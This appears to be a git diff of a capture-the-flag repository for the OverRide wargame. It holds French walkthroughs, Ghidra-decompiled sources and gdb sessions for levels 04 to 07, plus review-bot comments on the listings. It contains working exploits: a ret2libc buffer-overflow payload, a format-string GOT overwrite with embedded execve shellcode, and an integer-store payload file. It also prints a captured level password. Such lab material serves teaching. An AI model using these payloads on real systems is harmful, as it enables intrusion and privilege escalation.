+On remarque dans le code un 0x1337d00d, on l'essaye en mot de passe et ca marche pas, il y a un gros switch statement, avec un script on test les valeurs proche et ca fonctionne.
+
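Review bot: `main` calls `__isoc99_scanf()` and `test()` with no arguments while `test(int param_1,int param_2)` takes two, so the decompiler dropped the call-site arguments and the `0x1337d00d` constant the walkthrough refers to never appears anywhere in this listing. Either re-export `main` after correcting the prototypes in Ghidra, or add a comment at the `test();` line recording the arguments actually passed (the scanf target and the constant) so the walkthrough's reference can be checked against the source. The `switch(pEVar1)` also deserves a one-line comment that its case labels are hexadecimal, i.e. `0x10`–`0x15` are 16–21 rather than a contiguous 1–21 run, since that is easy to misread. In `decrypt`, the test `(!bVar6 && !bVar7) == bVar6` looks like a decompiler rendering of a byte-compare result against `"Congratulations!"`; a comment saying so (hedged as an interpretation) would help readers who are not used to Ghidra output.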
diff --git a/level04/Ressources/level04 b/level04/Ressources/level04 deleted file mode 100755 index 02a72a84923f72124d9cb3eb731d16a9d29d3902..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7797 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 -This is free software: you are free to change and redistribute it. -There is NO WARRANTY, to the extent permitted by law. Type "show copying" -and "show warranty" for details. -This GDB was configured as "x86_64-linux-gnu". -For bug reporting instructions, please see: -... -Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done. -(gdb) b main+150 -Function "main+150" not defined. -Make breakpoint pending on future shared library load? 
(y or [n]) ^Cn -(gdb) Quit -(gdb) b *main+150 -Breakpoint 1 at 0x804875e -(gdb) set follow-fork-mode child -(gdb) run -Starting program: /home/users/level04/level04 -[New process 1813] -Give me some shellcode, k -[Switching to process 1813] - -Breakpoint 1, 0x0804875e in main () -(gdb) p system -$1 = {} 0xf7e6aed0 -(gdb) p (char *)getenv("EGG") -$2 = 0xffffd857 ' ' ... -(gdb) exit -Undefined command: "exit". Try "help". -(gdb) quit -A debugging session is active. - - Inferior 2 [process 1813] will be killed. - -Quit anyway? (y or n) y -child is exiting... -level04@OverRide:~$ env -TERM=xterm-256color -SHELL=/bin/bash -SSH_CLIENT=10.0.2.2 59932 4242 -OLDPWD=/home/users/level04 -SSH_TTY=/dev/pts/0 -EGG= /bin/sh -USER=level04 -LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.a
xa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
-MAIL=/var/mail/level04
-PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
-PWD=/home/users/level04
-LANG=en_US.UTF-8
-SHLVL=1
-HOME=/home/users/level04
-LANGUAGE=en_US:en
-LOGNAME=level04
-SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242
-LESSOPEN=| /usr/bin/lesspipe %s
-LESSCLOSE=/usr/bin/lesspipe %s %s
-_=/usr/bin/env
-level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
--bash: exploit.txt: Permission denied
-level04@OverRide:~$ chmod +w .
-level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
-level04@OverRide:~$ cat exploit.txt - | ./level04
-Give me some shellcode, k
-whoami
-level05
-cat /home/users/level05/.pass
-3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
-
-
diff --git a/level04/source b/level04/source
new file mode 100644
index 0000000..aa8857c
--- /dev/null
+++ b/level04/source
@@ -0,0 +1,46 @@
+
+undefined4 main(void)
+
+{
+ int iVar1;
+ undefined4 *puVar2;
+ byte bVar3;
+ uint local_a4;
+ undefined4 local_a0 [32];
+ uint local_20;
+ uint local_1c;
+ long local_18;
+ __pid_t local_14;
+
+ bVar3 = 0;
+ local_14 = fork();
+ puVar2 = local_a0;
+ for (iVar1 = 0x20; iVar1 != 0; iVar1 = iVar1 + -1) {
+ *puVar2 = 0;
+ puVar2 = puVar2 + (uint)bVar3 * -2 + 1;
+ }
+ local_18 = 0;
+ local_a4 = 0;
+ if (local_14 == 0) {
+ prctl(1,1);
+ ptrace(PTRACE_TRACEME,0,0,0);
+ puts("Give me some shellcode, k");
+ gets((char *)local_a0);
+ }
+ else {
+ do {
+ wait(&local_a4);
+ local_20 = local_a4;
+ if (((local_a4 & 0x7f) == 0) ||
+ (local_1c = local_a4, '\0' < (char)(((byte)local_a4 & 0x7f) + 1) >> 1)) {
+ puts("child is exiting...");
+ return 0;
+ }
+ local_18 = ptrace(PTRACE_PEEKUSER,local_14,0x2c,0);
+ } while (local_18 != 0xb);
+ puts("no exec() for you");
+ kill(local_14,9);
+ }
+ return 0;
+}
+
diff --git a/level04/walkthrough b/level04/walkthrough
new file mode 100644
index 0000000..ab4acba
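Review bot: The parent-side loop `} while (local_18 != 0xb);` after `local_18 = ptrace(PTRACE_PEEKUSER,local_14,0x2c,0);` is left as bare magic numbers; on 32-bit x86 `0x2c` is the offset of `orig_eax` in `struct user_regs_struct` and `0xb` is `__NR_execve`, so the parent traces the child and kills it at its first execve, which is the claim the walkthrough makes only informally. A comment on that line, `/* 0x2c = orig_eax offset (i386 user_regs_struct); 0xb = __NR_execve: parent kills child on exec */`, would make it checkable, and `prctl(1,1)` deserves `/* PR_SET_PDEATHSIG, SIGHUP */`. The wait-status test `(local_a4 & 0x7f) == 0` is the expansion of `WIFEXITED` and the clause after `||` is glibc's `WIFSIGNALED`, which also read as noise without a note. The unbounded `gets((char *)local_a0)` into the 32-word `local_a0` is the defect the level is built around and should be marked as such in a one-line comment.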
--- /dev/null +++ b/level04/walkthrough @@ -0,0 +1,10 @@ +On remarque qu'on peut faire un ret override apres 156 'A', en revanche on ne peut pas utiliser de shellcode a cause du ptrace et de mecanique de fork (je crois). Il faut donc utiliser un ret2libc et appeler system avec l'argument "/bin/sh", on va devoir mettre des espace devant pour faire un un nop slide, en effet on n'est pas sur de taper au bon endroit en dehors de gdb et system trim l'input. Il faut aussi passer le bon argument a system, on peut le faire 8 bytes apres l'addresse du call on met l'address de notre variable d'evironnement dedans + +level04@OverRide:~$ export EGG=" /bin/sh" +level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > /tmp/exploit.txt +level04@OverRide:~$ cat /tmp/exploit.txt - | ./level04 +Give me some shellcode, k +whoami +level05 + + 
diff --git a/level05/Ressources/level05 b/level05/Ressources/level05 deleted file mode 100755 index b52ad99230a5327dfc28bfa6f044f0d17e010fae..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5176 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 diff --git a/level05/Ressources/walktrough.md b/level05/Ressources/walktrough.md deleted file mode 100644 index 2168b86..0000000 --- a/level05/Ressources/walktrough.md +++ /dev/null @@ -1,4 +0,0 @@ -level05@OverRide:~$ rm -f exploit && python -c "print('\xe0\x97\x04\x08'+'\xe2\x97\x04\x08'+'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'%54914x'+'%10\$n'+'%10555x'+'%11\$n')" > exploit -level05@OverRide:~$ cat exploit - | /home/users/level05/level05 - -write in 2 times with %n $ speifiy argument number, overwrite GOT table to jmp to shellcode diff --git a/level05/source b/level05/source new file mode 100644 index 0000000..c6a3591 --- /dev/null +++ b/level05/source @@ -0,0 +1,35 @@ +void main(void) + +{ + byte bVar1; + uint uVar2; + byte *pbVar3; + byte bVar4; + byte local_78 [100]; + uint local_14; + + bVar4 = 0; + local_14 = 0; + fgets((char *)local_78,100,stdin); + local_14 = 0; + do { + uVar2 = 0xffffffff; + pbVar3 = local_78; + do { + if (uVar2 == 0) break; + uVar2 = uVar2 - 1; + bVar1 = *pbVar3; + pbVar3 = pbVar3 + (uint)bVar4 * -2 + 1; + } while (bVar1 != 0); + if (~uVar2 - 1 <= local_14) { + printf((char *)local_78); + /* WARNING: Subroutine does not return */ + exit(0); + } + if (('@' < (char)local_78[local_14]) && ((char)local_78[local_14] < '[')) { + local_78[local_14] = local_78[local_14] ^ 0x20; + } + local_14 = local_14 + 1; + } while( true ); +} + 
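Review bot: `printf((char *)local_78)` passes the buffer filled by `fgets((char *)local_78,100,stdin)` directly as the format string, and the listing does not mark it; a comment on that line such as `/* non-literal format string: the fgets buffer is the format */` would make the file self-explaining. The loop above it only flips bytes in the range `'@' < c < '['` (upper-case ASCII) with `^ 0x20`, and its bound comes from an inlined `strlen` (the `0xffffffff` countdown with the `bVar4 * -2 + 1` direction-flag idiom), both of which deserve a one-line comment since they read as noise in decompiler output. In non-CTF code the remedy is `printf("%s", local_78)` or `fputs`, which is worth stating for readers using these listings to learn the defect class.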
diff --git a/level05/walkthrough b/level05/walkthrough new file mode 100644 index 0000000..aab4e40 --- /dev/null +++ b/level05/walkthrough @@ -0,0 +1,4 @@ +C'est un exploit printf avec un nombre trop grand pour etre ecrit via un seul %n, on en utilise donc 2 pour ecrire 2 bytes chacun. A noter qu'on aurait pu utiliser %hn aussi ce qui aurait ete plus propre. On override la got table avec l'adresse d'un shellcode place judicieusement dans la format string. A noter le $ qui permet de simuler le nieme arguement ce qui permet de rajouter un %x entre les 2 malgre qu'il devrait etre consecutif. (surement ca peut se bypass en decalant la deuxieme adresse '\xe2\x97\x04\x08' 4 bytes plus loin) + +level05@OverRide:~$ rm -f exploit && python -c "print('\xe0\x97\x04\x08'+'\xe2\x97\x04\x08'+'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'%54914x'+'%10\$n'+'%10555x'+'%11\$n')" > exploit +level05@OverRide:~$ cat exploit - | /home/users/level05/level05 
diff --git a/level06/Ressources/level06 b/level06/Ressources/level06 deleted file mode 100755 index 3a2fb2fea2bcb3bca69d8dbee9b49515ceb2e4fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7907 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 rEc@ Enter Login: "); + fgets(local_34,0x20,stdin); + puts("***********************************"); + puts("***** NEW ACCOUNT DETECTED ********"); + puts("***********************************"); + printf("-> Enter Serial: "); + __isoc99_scanf(); + iVar1 = auth(); + if (iVar1 == 0) { + puts("Authenticated!"); + system("/bin/sh"); + } + if (local_14 != *(int *)(in_GS_OFFSET + 0x14)) { + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + return iVar1 != 0; +} + diff --git a/level06/walkthrough b/level06/walkthrough new file mode 100644 index 0000000..dd187c4 --- /dev/null +++ b/level06/walkthrough 
@@ -0,0 +1 @@ +Il faut donner le bon numero de serie selon le login, on voit grace a ghidra l'algo de hash utilise, il suffit de le reverse (test.c) diff --git a/level07/Ressources/exploit.txt b/level07/Ressources/exploit.txt new file mode 100644 index 0000000..c015892 --- /dev/null +++ b/level07/Ressources/exploit.txt @@ -0,0 +1,40 @@ +store +1185988657 +43 +store +3375487793 +44 +store +384532685 +2147483693 +store +2294296923 +46 +store +1535706947 +47 +store +205752584 +2147483696 +store +1267534768 +49 +store +206802184 +50 +store +3857219789 +2147483699 +store +805306367 +52 +store +795765090 +53 +store +26739 +2147483702 +store +4294956528 +-1040108880 +store 
diff --git a/level07/Ressources/level07 b/level07/Ressources/level07 deleted file mode 100755 index d56fd3c72e9a9c0021e815717b4fc5e4ef641f0d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11744 zcmeHNeQ+GbmG6~SX7PtC8zl%VV1RXyjJ?RjHa1jZ$&w5<@&~d^2*!+8yR+KGt6gPx z7Rw0<_N|546H0Ws)FpLyb-_gnQjRMj6<4AFmy?mPOp2@6xvIpKkAftStRp8;f`Xku znEZa-)6!^7E*$^dKWh8!>tDauuV26Zm{CtZ+}gI@=kp1j%0#&!s_OFxR)F7gt&*$| zhPYJJiL1pTF$+bMt=I=0kbw%M3Y7Ul<)9AWj{W`s=`vsvWhj;eCIsq|9-1!%iS0NMD-W_0a7h0-2-B~l$U|kL0$(L=_D|Ta<)N=LqCqTNiD!6E!+B<9X&Enh$933 z0O>x+NLqduaz+^p9)q9XR;A8(ylfU;O3&ygK&UCd%f3*al;@??zz|&jm5n zU-ek+kvo4e+_gQ-rlzGG9<&ho`VyQj!JQ?zr39}n!SqQd1DQ{00M7Q}CAgsk?*ZQR zxIe%+ED%?SE5Tp-M~&wTMy$~z7pB?OolcoqJDjmiQy}CKhI*ASH*7&^G?6lMSt}}H zv1BeAhk7ELj;vW@W+UNLO!VaJEXq(jvfGTrcbl9#dJN;tNEvuHeT>Ptxt0XQHUjk+t#~PT0$;tRspeEy3!HEHW2?oYbjztq7$0V9d 